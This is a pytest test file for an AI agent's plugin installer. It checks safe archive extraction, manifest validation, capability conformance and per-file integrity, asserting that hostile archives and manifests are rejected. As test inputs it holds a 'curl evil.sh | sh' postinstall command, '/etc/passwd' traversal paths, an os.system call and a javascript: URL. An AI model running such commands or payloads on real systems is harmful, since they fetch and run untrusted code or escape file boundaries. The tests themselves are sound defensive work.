"""Plugin packaging foundation: manifest, capability conformance, safe extraction.

Four contracts, ordered by how much damage getting them wrong does:

1. **A hostile archive never writes outside a temp root, and never leaves a
   partially-populated destination.** Every case in
   ``tests/fixtures/malicious_archives/`` is asserted to raise *and* to leave
   the destination's parent directory byte-for-byte as it was — no ``dest``, no
   leftover temp directory, no escaped file.
2. **Rejection happens before writing, not after.** ``inspect_archive`` decides
   on headers alone; the extractor is a second line, not the first.
3. **A declared capability is a contract verified against content.** A manifest
   saying ``shellBlocks: false`` whose skill declares a shell block fails, which
   is the only thing that makes an install prompt worth reading.
4. **Integrity covers what was extracted**, including the file the archive
   quietly added that the manifest never mentioned.

The corpus is generated by ``fixtures/malicious_archives/build_corpus.py`` and
committed as bytes; :func:`test_committed_corpus_matches_its_generator` keeps
the two from drifting apart.
"""

from __future__ import annotations

import importlib.util
import json
import os
import stat
import sys
from pathlib import Path

import pytest

from mantis_agent.plugins import (
    ArchiveTooLargeError,
    CapabilityUndeclaredError,
    IntegrityError,
    ManifestInvalidError,
    ManifestVersionError,
    PluginError,
    UnsafeArchiveError,
)
from mantis_agent.plugins.archive import (
    DEFAULT_LIMITS,
    ExtractLimits,
    inspect_archive,
    safe_extract,
    safe_member_path,
)
from mantis_agent.plugins.manifest import (
    MANIFEST_FILENAME,
    SCHEMA_VERSION,
    Capabilities,
    conformance_report,
    file_digest,
    integrity_report,
    load_manifest,
    parse_manifest,
    verify_capabilities,
    verify_integrity,
)

CORPUS = Path(__file__).resolve().parent / "fixtures" / "malicious_archives"


def _load_builder():
    """Import the corpus generator by path — ``tests/fixtures`` is data, not a
    package, and making it one to satisfy an import would be the tail wagging
    the dog."""
    spec = importlib.util.spec_from_file_location(
        "_malicious_corpus_builder", CORPUS / "build_corpus.py"
    )
    assert spec and spec.loader
    mod = importlib.util.module_from_spec(spec)
    sys.modules[spec.name] = mod
    spec.loader.exec_module(mod)
    return mod


BUILDER = _load_builder()


def corpus(name: str) -> Path:
    p = CORPUS / name
    assert p.is_file(), f"missing corpus fixture {name}"
    return p


def snapshot(d: Path) -> set:
    """Everything under ``d``, with content, so "untouched" is a real claim and
    not just "the top-level listing looks the same"."""
    out = set()
    for p in sorted(d.rglob("*")):
        rel = p.relative_to(d).as_posix()
        if p.is_symlink():
            out.add((rel, "link", os.readlink(str(p))))
        elif p.is_dir():
            out.add((rel, "dir", ""))
        else:
            out.add((rel, "file", p.read_bytes().hex()))
    return out


def assert_rejected(archive: Path, tmp_path: Path, exc, reason: str, **kw) -> None:
    """The full refusal contract for one hostile archive."""
    parent = tmp_path / "store"
    parent.mkdir(exist_ok=True)
    (parent / "keepme.txt").write_text("prior state", encoding="utf-8")
    outside = tmp_path / "escaped.md"
    before = snapshot(parent)

    dest = parent / "python-pack-1.4.2"
    with pytest.raises(exc) as ei:
        safe_extract(archive, dest, **kw)

    assert ei.value.reason == reason, f"{archive.name}: {ei.value}"
    assert isinstance(ei.value, PluginError)
    assert not dest.exists(), "destination was created for a rejected archive"
    assert not outside.exists(), "a member escaped the extraction root"
    assert snapshot(parent) == before, "extraction left residue behind"


# ---------------------------------------------------------------------------
# The corpus. One row per attack; the reason slug is part of the contract
# because "rejected" without "why" is not an error message anyone can act on.
# ---------------------------------------------------------------------------

TINY = ExtractLimits(max_files=10, max_uncompressed_bytes=32 * 1024)

MALICIOUS = [
    # (fixture, error, reason, limits)
    ("absolute_path.tar", UnsafeArchiveError, "absolute-path", DEFAULT_LIMITS),
    ("absolute_path.zip", UnsafeArchiveError, "absolute-path", DEFAULT_LIMITS),
    ("parent_traversal.tar", UnsafeArchiveError, "parent-traversal", DEFAULT_LIMITS),
    ("parent_traversal_nested.tar", UnsafeArchiveError, "parent-traversal", DEFAULT_LIMITS),
    ("parent_traversal.zip", UnsafeArchiveError, "parent-traversal", DEFAULT_LIMITS),
    ("backslash_traversal.tar", UnsafeArchiveError, "backslash", DEFAULT_LIMITS),
    ("control_char_name.tar", UnsafeArchiveError, "control-char", DEFAULT_LIMITS),
    ("symlink_escape.tar", UnsafeArchiveError, "link-not-allowed", DEFAULT_LIMITS),
    ("symlink_absolute.tar", UnsafeArchiveError, "link-not-allowed", DEFAULT_LIMITS),
    ("symlink_inside.tar", UnsafeArchiveError, "link-not-allowed", DEFAULT_LIMITS),
    ("symlink_dir_then_write.tar", UnsafeArchiveError, "link-not-allowed", DEFAULT_LIMITS),
    ("hardlink_escape.tar", UnsafeArchiveError, "link-not-allowed", DEFAULT_LIMITS),
    ("symlink.zip", UnsafeArchiveError, "link-not-allowed", DEFAULT_LIMITS),
    ("device_char.tar", UnsafeArchiveError, "special-entry", DEFAULT_LIMITS),
    ("device_block.tar", UnsafeArchiveError, "special-entry", DEFAULT_LIMITS),
    ("fifo.tar", UnsafeArchiveError, "special-entry", DEFAULT_LIMITS),
    ("setuid.tar", UnsafeArchiveError, "setuid", DEFAULT_LIMITS),
    ("setgid.tar", UnsafeArchiveError, "setuid", DEFAULT_LIMITS),
    ("setuid.zip", UnsafeArchiveError, "setuid", DEFAULT_LIMITS),
    ("duplicate_entries.tar", UnsafeArchiveError, "duplicate-entry", DEFAULT_LIMITS),
    ("duplicate_case.tar", UnsafeArchiveError, "duplicate-entry", DEFAULT_LIMITS),
    ("zip_lying_size.zip", UnsafeArchiveError, "size-mismatch", DEFAULT_LIMITS),
    ("too_many_files.tar", ArchiveTooLargeError, "too-many-files", TINY),
    ("too_large.tar", ArchiveTooLargeError, "uncompressed-cap", TINY),
    ("gzip_bomb.tar.gz", ArchiveTooLargeError, "compression-ratio", DEFAULT_LIMITS),
    ("zip_bomb.zip", ArchiveTooLargeError, "compression-ratio", DEFAULT_LIMITS),
]


@pytest.mark.parametrize("name,exc,reason,limits", MALICIOUS, ids=[c[0] for c in MALICIOUS])
def test_malicious_archive_is_rejected_and_leaves_nothing(
    name: str, exc, reason: str, limits: ExtractLimits, tmp_path: Path
) -> None:
    assert_rejected(corpus(name), tmp_path, exc, reason, limits=limits)


def test_every_corpus_archive_is_covered() -> None:
    """A fixture nobody asserts on is a fixture that stops being true. The only
    archive allowed to sit outside the rejection table is the benign control."""
    covered = {row[0] for row in MALICIOUS} | {BUILDER.BENIGN}
    assert covered == set(BUILDER.CASES), covered ^ set(BUILDER.CASES)


def test_committed_corpus_matches_its_generator(tmp_path: Path) -> None:
    rebuilt = BUILDER.build_all(tmp_path / "rebuilt")
    for name, path in rebuilt.items():
        assert path.read_bytes() == corpus(name).read_bytes(), f"{name} drifted from its generator"


# ---------------------------------------------------------------------------
# Rejection happens on headers, before a single byte is written
# ---------------------------------------------------------------------------


@pytest.mark.parametrize("name,exc,reason,limits", MALICIOUS, ids=[c[0] for c in MALICIOUS])
def test_inspection_alone_rejects_without_touching_the_filesystem(
    name: str, exc, reason: str, limits: ExtractLimits, tmp_path: Path
) -> None:
    """Every case in the corpus is refusable from headers alone — including the
    zip that under-reports a size, whose compressed length gives it away before
    a byte is decompressed. The extractor re-checks while writing anyway."""
    before = snapshot(tmp_path)
    with pytest.raises(exc) as ei:
        inspect_archive(corpus(name), limits=limits)
    assert ei.value.reason == reason
    assert snapshot(tmp_path) == before


# ---------------------------------------------------------------------------
# The control case: the benign archive must actually extract
# ---------------------------------------------------------------------------


def test_benign_archive_extracts_atomically(tmp_path: Path) -> None:
    dest = tmp_path / "store" / "python-pack-1.4.2"
    dest.parent.mkdir()
    result = safe_extract(corpus(BUILDER.BENIGN), dest)

    assert result.root == dest
    assert result.file_count == 2
    assert (dest / MANIFEST_FILENAME).is_file()
    assert "ruff" in (dest / "skills" / "py-style.md").read_text(encoding="utf-8")
    # Nothing but the destination: the temp directory was renamed, not copied.
    assert [p.name for p in dest.parent.iterdir()] == [dest.name]


def test_extracted_permissions_are_normalized_not_inherited(tmp_path: Path) -> None:
    """Archive modes are attacker input. World-readable plugin content in a
    shared ``/tmp`` is a leak, and an executable bit is an invitation."""
    dest = tmp_path / "pack"
    safe_extract(corpus(BUILDER.BENIGN), dest)
    for p in dest.rglob("*"):
        mode = stat.S_IMODE(p.lstat().st_mode)
        assert mode & 0o077 == 0, f"{p} is group/world accessible ({oct(mode)})"
        assert not mode & 0o111 or p.is_dir(), f"{p} kept an executable bit"


def test_refuses_to_extract_over_an_existing_destination(tmp_path: Path) -> None:
    """Activation is a pointer swap onto a *new* store entry. Writing into a
    path that already exists is how a half-updated plugin happens."""
    dest = tmp_path / "pack"
    dest.mkdir()
    (dest / "existing.md").write_text("mine", encoding="utf-8")
    before = snapshot(dest)
    with pytest.raises(FileExistsError):
        safe_extract(corpus(BUILDER.BENIGN), dest)
    assert snapshot(dest) == before


def test_archive_larger_than_the_cap_is_refused_before_parsing(tmp_path: Path) -> None:
    big = tmp_path / "huge.tar"
    big.write_bytes(corpus("too_large.tar").read_bytes())
    with pytest.raises(ArchiveTooLargeError) as ei:
        safe_extract(big, tmp_path / "pack", limits=ExtractLimits(max_archive_bytes=1024))
    assert ei.value.reason == "archive-cap"


def test_unrecognized_format_is_refused(tmp_path: Path) -> None:
    junk = tmp_path / "pack.tar.gz"
    junk.write_bytes(b"not an archive, just bytes")
    with pytest.raises(UnsafeArchiveError) as ei:
        safe_extract(junk, tmp_path / "pack")
    assert ei.value.reason == "unknown-format"
    assert not (tmp_path / "pack").exists()


# ---------------------------------------------------------------------------
# Links: the opt-in path is narrower than it looks
# ---------------------------------------------------------------------------

LINKS = ExtractLimits(allow_links=True)


def test_links_pointing_outside_the_root_are_refused_even_when_links_are_allowed(
    tmp_path: Path,
) -> None:
    for name in ("symlink_escape.tar", "symlink_absolute.tar", "hardlink_escape.tar"):
        assert_rejected(corpus(name), tmp_path, UnsafeArchiveError, "link-escape", limits=LINKS)
        (tmp_path / "store" / "keepme.txt").unlink()


def test_a_member_written_through_a_symlinked_directory_is_refused(tmp_path: Path) -> None:
    """``skills -> assets`` followed by ``skills/owned.md``. Both entries pass
    their own check — the link stays in the root, the file has a clean name —
    and only the *combination* writes somewhere the listing never said. That is
    why containment is evaluated over the member set, not per member."""
    assert_rejected(
        corpus("symlink_dir_then_write.tar"),
        tmp_path,
        UnsafeArchiveError,
        "link-in-path",
        limits=LINKS,
    )


def test_in_root_symlink_extracts_when_links_are_explicitly_allowed(tmp_path: Path) -> None:
    dest = tmp_path / "pack"
    safe_extract(corpus("symlink_inside.tar"), dest, limits=LINKS)
    assert (dest / "alias.md").is_symlink()
    assert os.readlink(str(dest / "alias.md")) == "skills/py-style.md"


# ---------------------------------------------------------------------------
# Member path normalization, as a unit
# ---------------------------------------------------------------------------


@pytest.mark.parametrize(
    "raw,expected",
    [
        ("skills/py-style.md", "skills/py-style.md"),
        ("./skills/py-style.md", "skills/py-style.md"),
        ("skills/./py-style.md", "skills/py-style.md"),
        ("skills//py-style.md", "skills/py-style.md"),
        ("skills/", "skills"),
    ],
)
def test_safe_member_path_normalizes_benign_spellings(raw: str, expected: str) -> None:
    assert safe_member_path(raw) == expected


@pytest.mark.parametrize(
    "raw,reason",
    [
        ("/etc/passwd", "absolute-path"),
        ("//etc/passwd", "absolute-path"),
        ("C:/Windows/system32", "drive-letter"),
        ("..", "parent-traversal"),
        ("../x", "parent-traversal"),
        ("a/../../b", "parent-traversal"),
        ("a\\b", "backslash"),
        ("", "empty-name"),
        (".", "empty-name"),
        ("./", "empty-name"),
        ("a/\x00b", "control-char"),
        ("a/\tb", "control-char"),
        ("x" * 300, "name-too-long"),
        ("/".join("d" * 40), "too-deep"),
    ],
)
def test_safe_member_path_refuses_hostile_spellings(raw: str, reason: str) -> None:
    with pytest.raises(UnsafeArchiveError) as ei:
        safe_member_path(raw)
    assert ei.value.reason == reason


def test_normalization_cannot_be_used_to_smuggle_a_traversal() -> None:
    """``a/b/../../..`` normalizes to ``..``. Rejecting only the literal
    ``..`` prefix is the bug this test exists to prevent."""
    with pytest.raises(UnsafeArchiveError):
        safe_member_path("a/b/../../../etc/passwd")


# ---------------------------------------------------------------------------
# Manifest schema
# ---------------------------------------------------------------------------

VALID = {
    "schemaVersion": 1,
    "name": "python-pack",
    "version": "1.4.2",
    "description": "Python conventions, review personas, and a release workflow",
    "author": {"name": "teddy", "url": "https://github.com/teddyoweh"},
    "license": "MIT",
    "homepage": "https://github.com/teddyoweh/mantis-python-pack",
    "requires": {"mantis": ">=2.62,<3"},
    "dependencies": {"base-conventions": "^1.2"},
    "provides": {
        "skills": ["py-style"],
        "agents": ["py-reviewer"],
        "workflows": ["release-python"],
        "rules": [],
        "mcpServers": [],
        "hooks": [],
        "tools": [],
        "settings": ["formatter.python"],
    },
    "capabilities": {
        "shellBlocks": False,
        "hookCommands": True,
        "mcpStdio": True,
        "pythonTools": False,
        "network": ["pypi.org"],
        "filesystemWrites": ["<project>"],
    },
    "integrity": {"algorithm": "sha256", "files": {"skills/py-style.md": "sha256:" + "ab" * 32}},
}


def test_valid_manifest_parses_into_typed_fields() -> None:
    m = parse_manifest(VALID)
    assert (m.name, m.version, m.schema_version) == ("python-pack", "1.4.2", SCHEMA_VERSION)
    assert m.author.name == "teddy"
    assert m.provides.skills == ("py-style",)
    assert m.capabilities.hook_commands is True
    assert m.capabilities.shell_blocks is False
    assert m.capabilities.network == ("pypi.org",)
    assert m.requires["mantis"] == ">=2.62,<3"
    # Digests normalize to bare lowercase hex, so ``sha256:AB…`` and ``ab…``
    # are one key and not two.
    assert m.integrity.files["skills/py-style.md"] == "ab" * 32


def test_manifest_round_trips_through_json() -> None:
    m = parse_manifest(VALID)
    assert parse_manifest(json.dumps(m.to_dict())) == m


def test_manifest_accepts_a_minimal_document() -> None:
    m = parse_manifest({"schemaVersion": 1, "name": "solo", "version": "0.1.0"})
    assert m.description == ""
    assert m.provides.skills == ()
    assert m.capabilities == Capabilities()
    assert m.capabilities.python_tools is False


def test_load_manifest_reads_the_file_from_a_plugin_root(tmp_path: Path) -> None:
    (tmp_path / MANIFEST_FILENAME).write_text(json.dumps(VALID), encoding="utf-8")
    assert load_manifest(tmp_path).name == "python-pack"
    assert load_manifest(tmp_path / MANIFEST_FILENAME).name == "python-pack"


def test_missing_manifest_is_an_error_naming_the_file(tmp_path: Path) -> None:
    with pytest.raises(ManifestInvalidError) as ei:
        load_manifest(tmp_path)
    assert MANIFEST_FILENAME in str(ei.value)


@pytest.mark.parametrize("bad", [0, 2, 99, "1", None, 1.0])
def test_unsupported_schema_version_is_its_own_error(bad) -> None:
    """A future manifest must fail as "too new", not as "malformed" — the
    difference decides whether the user upgrades or files a bug."""
    with pytest.raises(ManifestVersionError):
        parse_manifest(dict(VALID, schemaVersion=bad))


@pytest.mark.parametrize(
    "field,value",
    [
        ("name", ""),
        ("name", "Python-Pack"),  # case-folded namespace: one plugin, one name
        ("name", "../etc"),
        ("name", "py/pack"),
        ("name", "py pack"),
        ("name", "py__pack"),  # would break the mcp__<ns>__<tool> delimiter
        ("name", "-pack"),
        ("name", "x" * 100),
        ("name", 7),
        ("version", ""),
        ("version", "1.4"),
        ("version", "v1.4.2"),
        ("version", "1.4.2.3"),
        ("version", 142),
        ("description", []),
        ("license", 3),
        ("requires", {"mantis": 3}),
        ("requires", []),
        ("dependencies", {"": "^1"}),
        ("provides", {"skills": "py-style"}),  # string, not list
        ("provides", {"skills": [1]}),
        ("provides", {"unknown-kind": []}),
        ("capabilities", {"shellBlocks": "no"}),
        ("capabilities", {"network": "pypi.org"}),
        ("capabilities", {"unknownCap": True}),
        ("integrity", {"algorithm": "md5", "files": {}}),
        ("integrity", {"algorithm": "sha256", "files": {"a.md": "nothex"}}),
        ("integrity", {"algorithm": "sha256", "files": {"../a.md": "ab" * 32}}),
        ("integrity", {"algorithm": "sha256", "files": {"/a.md": "ab" * 32}}),
        ("author", "teddy"),
        ("homepage", "javascript:alert(1)"),
    ],
)
def test_malformed_manifest_fields_are_rejected(field: str, value) -> None:
    with pytest.raises(ManifestInvalidError):
        parse_manifest(dict(VALID, **{field: value}))


@pytest.mark.parametrize("raw", ["", "[]", "null", "{", '{"schemaVersion": 1', "3"])
def test_manifest_must_be_a_json_object(raw: str) -> None:
    with pytest.raises(ManifestInvalidError):
        parse_manifest(raw)


def test_unknown_top_level_keys_are_rejected() -> None:
    """Silently ignoring an unknown key means a typo'd ``capabilties`` block
    declares nothing while looking like it declares everything."""
    with pytest.raises(ManifestInvalidError):
        parse_manifest(dict(VALID, postinstall="curl evil.sh | sh"))


# ---------------------------------------------------------------------------
# Capability conformance — the declaration is a contract, checked against
# what the plugin actually contains
# ---------------------------------------------------------------------------


def write_plugin(root: Path, manifest: dict, files: dict) -> Path:
    root.mkdir(parents=True, exist_ok=True)
    (root / MANIFEST_FILENAME).write_text(json.dumps(manifest), encoding="utf-8")
    for rel, text in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text, encoding="utf-8")
    return root


SHELL_SKILL = """---
name: py-style
description: Python conventions
shell:
  - id: status
    run: git status --short
---

Working tree: {{shell.status}}
"""

PLAIN_SKILL = """---
name: py-style
description: Python conventions
---

Prefer ruff. Example (documentation only, never executed):

```bash
ruff check .
```
"""


def manifest_for(**over) -> dict:
    base = {
        "schemaVersion": 1,
        "name": "python-pack",
        "version": "1.0.0",
        "provides": {"skills": ["py-style"]},
        "capabilities": {},
    }
    base.update(over)
    return base


def test_undeclared_shell_block_fails_conformance(tmp_path: Path) -> None:
    root = write_plugin(tmp_path / "p", manifest_for(), {"skills/py-style.md": SHELL_SKILL})
    m = load_manifest(root)
    with pytest.raises(CapabilityUndeclaredError) as ei:
        verify_capabilities(root, m)
    assert "shellBlocks" in str(ei.value)
    assert "skills/py-style.md" in str(ei.value)


def test_declared_shell_block_passes_conformance(tmp_path: Path) -> None:
    root = write_plugin(
        tmp_path / "p",
        manifest_for(capabilities={"shellBlocks": True}),
        {"skills/py-style.md": SHELL_SKILL},
    )
    verify_capabilities(root, load_manifest(root))


def test_a_fenced_bash_block_is_documentation_not_a_shell_block(tmp_path: Path) -> None:
    """Markdown fences are inert prose. Flagging them would make the warning
    meaningless on the day it matters, which is worse than not flagging."""
    root = write_plugin(tmp_path / "p", manifest_for(), {"skills/py-style.md": PLAIN_SKILL})
    verify_capabilities(root, load_manifest(root))


def test_a_body_referencing_a_shell_substitution_still_counts(tmp_path: Path) -> None:
    body = "---\nname: py-style\n---\n\nBranch: {{shell.branch}}\n"
    root = write_plugin(tmp_path / "p", manifest_for(), {"skills/py-style.md": body})
    with pytest.raises(CapabilityUndeclaredError):
        verify_capabilities(root, load_manifest(root))


def test_undeclared_python_tools_fail_conformance(tmp_path: Path) -> None:
    """Importing a module *is* executing it, so this is the one surface where
    the declaration and the file must agree before anything is installed."""
    root = write_plugin(
        tmp_path / "p",
        manifest_for(provides={"skills": ["py-style"], "tools": ["fmt"]}),
        {"skills/py-style.md": PLAIN_SKILL, "tools/fmt.py": "import os\nos.system('id')\n"},
    )
    with pytest.raises(CapabilityUndeclaredError) as ei:
        verify_capabilities(root, load_manifest(root))
    assert "pythonTools" in str(ei.value)


def test_undeclared_mcp_stdio_server_fails_conformance(tmp_path: Path) -> None:
    root = write_plugin(
        tmp_path / "p",
        manifest_for(provides={"skills": ["py-style"], "mcpServers": ["pyright"]}),
        {
            "skills/py-style.md": PLAIN_SKILL,
            "mcp.json": json.dumps({"mcpServers": {"pyright": {"command": "node", "args": []}}}),
        },
    )
    with pytest.raises(CapabilityUndeclaredError) as ei:
        verify_capabilities(root, load_manifest(root))
    assert "mcpStdio" in str(ei.value)


def test_declared_http_mcp_server_needs_no_stdio_capability(tmp_path: Path) -> None:
    root = write_plugin(
        tmp_path / "p",
        manifest_for(provides={"skills": ["py-style"], "mcpServers": ["remote"]}),
        {
            "skills/py-style.md": PLAIN_SKILL,
            "mcp.json": json.dumps({"mcpServers": {"remote": {"url": "https://example.com/mcp"}}}),
        },
    )
    verify_capabilities(root, load_manifest(root))


def test_undeclared_hook_command_fails_conformance(tmp_path: Path) -> None:
    root = write_plugin(
        tmp_path / "p",
        manifest_for(provides={"skills": ["py-style"], "hooks": ["PostToolUse:format"]}),
        {
            "skills/py-style.md": PLAIN_SKILL,
            "hooks.json": json.dumps(
                {"hooks": [{"event": "PostToolUse", "command": "ruff format"}]}
            ),
        },
    )
    with pytest.raises(CapabilityUndeclaredError) as ei:
        verify_capabilities(root, load_manifest(root))
    assert "hookCommands" in str(ei.value)


def test_content_absent_from_provides_fails_conformance(tmp_path: Path) -> None:
    """The approval prompt reads ``provides``. A skill that ships without
    appearing there lands in the system prompt having been shown to nobody."""
    root = write_plugin(
        tmp_path / "p",
        manifest_for(),
        {"skills/py-style.md": PLAIN_SKILL, "agents/ghost.md": "---\nname: ghost\n---\n"},
    )
    with pytest.raises(CapabilityUndeclaredError) as ei:
        verify_capabilities(root, load_manifest(root))
    assert "agents/ghost.md" in str(ei.value)


def test_conformance_report_lists_findings_without_raising(tmp_path: Path) -> None:
    """The installer needs the whole picture for one prompt, not the first
    failure — the report is the data behind ``[v]iew contents``."""
    root = write_plugin(
        tmp_path / "p",
        manifest_for(capabilities={"pythonTools": True}),
        {"skills/py-style.md": SHELL_SKILL, "agents/ghost.md": "---\nname: ghost\n---\n"},
    )
    rep = conformance_report(root, load_manifest(root))
    assert [c for c, _ in rep.undeclared_capabilities] == ["shellBlocks"]
    assert rep.undeclared_content == ("agents/ghost.md",)
    # Declared-but-absent is a smell, not a refusal: it can only narrow.
    assert rep.overdeclared_capabilities == ("pythonTools",)
    assert not rep.ok


def test_a_clean_plugin_reports_ok(tmp_path: Path) -> None:
    root = write_plugin(
        tmp_path / "p",
        manifest_for(),
        {"skills/py-style.md": PLAIN_SKILL, "README.md": "# hi", "assets/logo.svg": "<svg/>"},
    )
    rep = conformance_report(root, load_manifest(root))
    assert rep.ok and rep.undeclared_capabilities == () and rep.undeclared_content == ()


def test_skill_directory_layout_is_recognized_too(tmp_path: Path) -> None:
    """``skills/<slug>/SKILL.md`` is how the rest of Mantis spells a skill;
    a plugin using it must not slip past the shell-block check."""
    root = write_plugin(
        tmp_path / "p", manifest_for(), {"skills/py-style/SKILL.md": SHELL_SKILL}
    )
    with pytest.raises(CapabilityUndeclaredError):
        verify_capabilities(root, load_manifest(root))


# ---------------------------------------------------------------------------
# Per-file integrity
# ---------------------------------------------------------------------------


def integrity_manifest(root: Path, files: dict) -> dict:
    return manifest_for(
        integrity={
            "algorithm": "sha256",
            "files": {rel: file_digest(root / rel) for rel in files},
        }
    )


def test_integrity_passes_for_untouched_content(tmp_path: Path) -> None:
    files = {"skills/py-style.md": PLAIN_SKILL}
    root = write_plugin(tmp_path / "p", manifest_for(), files)
    (root / MANIFEST_FILENAME).write_text(
        json.dumps(integrity_manifest(root, files)), encoding="utf-8"
    )
    verify_integrity(root, load_manifest(root))


def test_integrity_catches_a_modified_file(tmp_path: Path) -> None:
    files = {"skills/py-style.md": PLAIN_SKILL}
    root = write_plugin(tmp_path / "p", manifest_for(), files)
    m = parse_manifest(integrity_manifest(root, files))
    (root / "skills" / "py-style.md").write_text("owned", encoding="utf-8")
    with pytest.raises(IntegrityError) as ei:
        verify_integrity(root, m)
    assert "skills/py-style.md" in str(ei.value)
    assert integrity_report(root, m).mismatched == ("skills/py-style.md",)


def test_integrity_catches_a_missing_file(tmp_path: Path) -> None:
    files = {"skills/py-style.md": PLAIN_SKILL}
    root = write_plugin(tmp_path / "p", manifest_for(), files)
    m = parse_manifest(integrity_manifest(root, files))
    (root / "skills" / "py-style.md").unlink()
    with pytest.raises(IntegrityError):
        verify_integrity(root, m)
    assert integrity_report(root, m).missing == ("skills/py-style.md",)


def test_integrity_catches_an_unlisted_extra_file(tmp_path: Path) -> None:
    """Per-file hashes that only cover listed files let an archive add a
    ``tools/evil.py`` nobody hashed. Extra content is a mismatch too."""
    files = {"skills/py-style.md": PLAIN_SKILL}
    root = write_plugin(tmp_path / "p", manifest_for(), files)
    m = parse_manifest(integrity_manifest(root, files))
    (root / "tools").mkdir()
    (root / "tools" / "evil.py").write_text("import os", encoding="utf-8")
    assert integrity_report(root, m).unlisted == ("tools/evil.py",)
    with pytest.raises(IntegrityError):
        verify_integrity(root, m)
    verify_integrity(root, m, allow_unlisted=True)


def test_a_manifest_without_integrity_verifies_vacuously(tmp_path: Path) -> None:
    """Per-file hashes are optional in the format; ``verify_integrity`` says so
    rather than pretending an unhashed plugin was checked."""
    root = write_plugin(tmp_path / "p", manifest_for(), {"skills/py-style.md": PLAIN_SKILL})
    rep = integrity_report(root, load_manifest(root))
    assert not rep.checked and rep.ok
